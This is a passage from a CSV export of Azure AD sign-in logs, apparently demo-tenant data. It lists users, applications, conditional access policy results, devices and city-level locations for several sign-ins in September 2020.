'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",028ee73f-e71d-464b-b4fd-9db2c5a62000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,028ee73f-e71d-464b-b4fd-9db2c5a62000,SigninLogs,Sucess,33.45851135,-82.21336365
+340,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d556854-34b0-4187-b4dd-488e07e3ee0c,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42a7a29d-b80d-4b65-b54b-05b5c7082100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,42a7a29d-b80d-4b65-b54b-05b5c7082100,SigninLogs,Sucess,33.45851135,-82.21336365
+341,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:10.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,72953ff0-921f-4dbb-95df-bb908f69f71c,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft 365 Security and Compliance Center,80ccca67-54bd-44ab-8625-4b79c4dc7775,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",82df5368-1a8b-4fb8-b076-b0dfc7e32000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0dfc7e32000,SigninLogs,Sucess,33.45851135,-82.21336365
+342,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1c10553-1f37-46f4-9a5e-b55eb3c19fb7,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42a7a29d-b80d-4b65-b54b-05b57b082100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,42a7a29d-b80d-4b65-b54b-05b57b082100,SigninLogs,Sucess,33.45851135,-82.21336365
+343,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d556854-34b0-4187-b4dd-488e07e3ee0c,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42a7a29d-b80d-4b65-b54b-05b5c7082100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,42a7a29d-b80d-4b65-b54b-05b5c7082100,SigninLogs,Sucess,33.45851135,-82.21336365
+344,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:47.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4a14479f-403c-0000-54b3-333a02277288,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",53b0f25d-c935-4697-96da-86164cd11200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,53b0f25d-c935-4697-96da-86164cd11200,SigninLogs,Sucess,33.7984581,-84.38828278
+345,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",d8cc9a0b-af3e-47ed-a4bd-60439fbb7000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d8cc9a0b-af3e-47ed-a4bd-60439fbb7000,SigninLogs,Sucess,35.01296997,-80.93171692
+346,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:47.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:34,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2f87158a-7a6e-452d-a55e-5e70a6646100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2f87158a-7a6e-452d-a55e-5e70a6646100,SigninLogs,Sucess,32.32146072,34.85319901
+347,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9f7e9db-3f0b-40ca-9a83-da6cf4414a1e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form 